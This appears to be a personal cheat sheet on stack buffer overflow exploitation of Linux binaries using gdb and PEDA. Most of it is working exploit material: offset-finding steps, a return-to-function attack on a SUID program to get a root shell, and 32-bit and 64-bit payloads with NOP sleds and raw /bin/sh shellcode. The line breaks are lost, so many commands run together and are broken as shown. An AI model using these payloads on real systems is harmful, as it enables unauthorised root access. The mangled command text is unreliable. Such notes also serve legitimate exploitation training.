file <program>ltrace <program>strings <program>checksec
sudo apt-get install gdbulimit -c unlimited​# if cores arent being created use below as rootecho "core" > /proc/sys/kernel/core_pattern​# Install PEDAgit clone https://github.com/longld/peda.git ~/pedaecho "source ~/peda/peda.py" >> ~/.gdbinit​# Find program vulnerable to buffer overflow# Create bufferpython -c 'print "A"*2000' > 2k.txt​# Pipe buffer to programcat 2k.txt | ./vulnerableprogram​# If crashes a core should be dumped​# Analyse coregdb -q vulnerableprogram ./core
b = breakpointc = continuedisas = disasemblex/s = hexadecimal string at addressx/40wx $esp-0x200 = hexadecimal 40 words in hex of $esp register - 200 bytes​info functionsinfo registers
# Open Coregcb -q vulnerableprogram ./core​# View available optionshelp pattern​# Create pattern with unique strings to find overflowpattern create 2000 pattern.txt​# Run pattern without leaving gdbrun < pattern.txt​# can also do 'pattern_create 2000' which will print to screen# can then use 'run "pattern"' to execute​# Will show the memory address that fails (e.g 0x41426e41 in ??))# Find offset of that address within gdbpattern offset 0x<address>​# Quit gdbquit​# Will give us bytes for offset, create an overflow that goes to that addresspython -c 'print "A"*<offsetbytes> + "BBBB"' > eip.txt​# Go back into GDBgdb -q vulnerableprogram ./core​# Run EIPrun < eip.txt​# Should now see all BBBB so we can write to the correct location# Quit GDB
# Open new GDBgdb -q vulnerableprogram​# List functions within gdbinfo functions​# Look for non standard functions# Analyse themdisas <function>e.g. disas main​# Instruction directly before system call is a string, analyse the string# Push <address1># call <address2> <system@plt>x/s <address1>
# If the string above is a call to a shell and its a suid program# Then this function can be used for a root shell​# Write the buffer with the address of the start of the function# This has to be little endian and is the function entry point# In the below the entry point was 0x080484cb​python -c 'print "A"*<offsetbytes> + "\xcb\x84\x04\x08"'> root.txt​# Launch GDBgdb -q vulnerableprogram​# Run exploitrun < root.txt​# May see shell spawn but die instantly. This is due to SDTIN Closing early.# Can bypass with piping input to SUID program like below(cat root.txt; cat) | ./vulnerableprogram​# This should keep it open# If dev has been done on a copy in a writeable location, now point to live​(cat root.txt; cat) | /home/xdev/Desktop/vulnerableprogramsuid​# Prove root shellidwhoami​# Spawn full TTYpython -c 'import pty;pty.spawn("/bin/sh")'
# Run python in GDBrun `python exploit.py`​# python script has sc and buffers / nops etc​sc = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80"payload = "\x90"*50 # NOP Sledpayload += sc # Add shellcodepayload += "A"*(390-50-len(sc)) # Fill buffer - nop - shellcodepayload += "\xe0\xf2\xff\xbf" # EIP = 0xbffff2c0​print payload​# Above spawns a bash shell. (values change obvs)​# EIP might need changing outside of GDB due to environment variable changes.# If so run program like below./program `python exploit.py`​# open dumpgdb -q ./program ./core​# debugx/40wx $esp-0x200​# Look for the old EIP and if its still valid. Choose a new one in the NOP sled
# Look into registers more# ESP changes to RSP# EIP changes to RIP
Code below is an example in 64bit using a stack overflow to call /bin/sh
from struct import pack​buf = ""buf += "\x48\x31\xc9\x48\x81\xe9\xfa\xff\xff\xff\x48\x8d\x05"buf += "\xef\xff\xff\xff\x48\xbb\xfc\x4e\xe5\x0e\x7e\x6b\xa5"buf += "\x19\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4"buf += "\x96\x75\xbd\x97\x36\xd0\x8a\x7b\x95\x20\xca\x7d\x16"buf += "\x6b\xf6\x51\x75\xa9\x8d\x23\x1d\x6b\xa5\x51\x75\xa8"buf += "\xb7\xe6\x76\x6b\xa5\x19\xd3\x2c\x8c\x60\x51\x18\xcd"buf += "\x19\xaa\x19\xad\x87\x98\x64\xa0\x19"​payload = "\x90"*40 #NOP Sledpayload += buf # Shellcodepayload += "A"*(128-len(buf)) #Padding to fill out bufferpayload += pack("<Q", 0x7fffffffe418) #Setting return address to one in NOP sled​print payload
​